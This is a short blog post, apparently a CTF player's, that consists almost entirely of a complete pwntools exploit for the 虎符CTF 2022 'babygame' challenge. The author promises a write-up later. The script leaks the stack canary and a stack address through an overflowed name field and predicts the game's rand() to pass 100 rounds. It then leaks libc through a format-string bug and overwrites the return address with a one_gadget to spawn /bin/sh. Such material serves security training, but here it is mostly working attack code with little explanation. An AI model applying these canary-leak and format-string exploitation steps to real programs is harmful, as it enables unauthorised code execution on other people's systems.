虎符CTF 2022 babygame wp

先贴下exp,wp晚点来补

完整exp


    # Arch:     amd64-64-little
    # RELRO:    Full RELRO
    # Stack:    Canary found
    # NX:       NX enabled
    # PIE:      PIE enabled

from pwn import *
from ctypes import *
# from LibcSearcher import *
import sys
context(os = 'linux' , arch = 'amd64') 
context.terminal = ["tmux", "splitw", "-h"]
local = 1
if local == 0:
  io = remote('1.14.71.254',28788)
else:
  io = process("/mnt/c/Users/M1sceden4/Desktop/pwn/babygame_虎符CTF_2022")


libc_rand = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
payload_0 = b'a' * (0x120 - 0x18 + 0x1) 
io.sendlineafter("Please input your name:\n" , payload_0)

io.recvuntil(b'a'*(0x120 - 0x18 + 0x1))
canary = u64(io.recv(7).rjust(8 , b'\x00'))
stack = u64(io.recv(6).ljust(8 , b'\x00')) #canary会带着后面的rbp一起被输出


success('canary:\t' + hex(canary))
success('stack:\t' + hex(stack))
  # print(io.recv())
libc_rand.srand(0x6161616161616161)
for i in range(100):
    io.recvuntil("round {}: \n".format(i + 1))
    num = libc_rand.rand()
    if (num % 3) == 1:
        io.sendline('2')
    if (num % 3) == 2:
        io.sendline('0')
    if (num % 3) == 0:
        io.sendline('1')

'''one_gadget 
0xe3b2e execve("/bin/sh", r15, r12)
constraints:
  [r15] == NULL || r15 == NULL
  [r12] == NULL || r12 == NULL

0xe3b31 execve("/bin/sh", r15, rdx)
constraints:
  [r15] == NULL || r15 == NULL
  [rdx] == NULL || rdx == NULL

0xe3b34 execve("/bin/sh", rsi, rdx)
constraints:
  [rsi] == NULL || rsi == NULL
  [rdx] == NULL || rdx == NULL
'''

elf = ELF("/mnt/c/Users/M1sceden4/Desktop/pwn/babygame_虎符CTF_2022")
pop_rdi_ret = 0x23b72
ret = 0x022679
#ret = 

payload_1 = b'%62c%8$hhn-%79$p' + p64(stack - 0x218) #?

io.sendlineafter('Good luck to you.\n' , payload_1)
# gdb.attach(io)
  # print(io.recv())
# print(io.recv())
io.recvuntil('-')
  # libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

libc_start_main = int(io.recv(14) , 16) - 243
  # libc = LibcSearcher('__libc_start_main' , libc_start_main)
libc = elf.libc
success('libc_start_main:\t' + hex(libc_start_main))
success('libc.start_main:\t' + hex(libc.sym['__libc_start_main']))
  # libc_base = libc_start_main - libc.dump('__libc_start_main')
libc_base = libc_start_main - libc.sym['__libc_start_main']
success("libc_base:\t" + hex(libc_base))
  # system = libc.dump('system') + libc_base
'''system = libc.sym['system'] + libc_base
  # bin_sh = libc.dump('str_bin_sh') + libc_base
bin_sh = next(libc.search(b'/bin/sh\x00')) + libc_base
'''
ret += libc_base
pop_rdi_ret += libc_base

# one_gadget = libc_base + 0xe3b31
#  payload_2 = fmtstr_payload(6 , {stack : one_gadget})
#payload_2 =  b'b' * (0x120 - 0x18) + p64(canary) + p64(0)*3 + p64(ret) + p64(pop_rdi_ret) + p64(bin_sh) + p64(system)
one_gadget = [0xE3B2E + libc_base, 0xE3B31 + libc_base, 0xE3B34 + libc_base]
payload2 = fmtstr_payload(6,{stack - 0x218:one_gadget[1]})
io.sendlineafter('Good luck to you.\n' , payload2)
io.interactive()
posted @ 2022-05-10 22:22  dotExp  阅读(150)  评论(0编辑  收藏  举报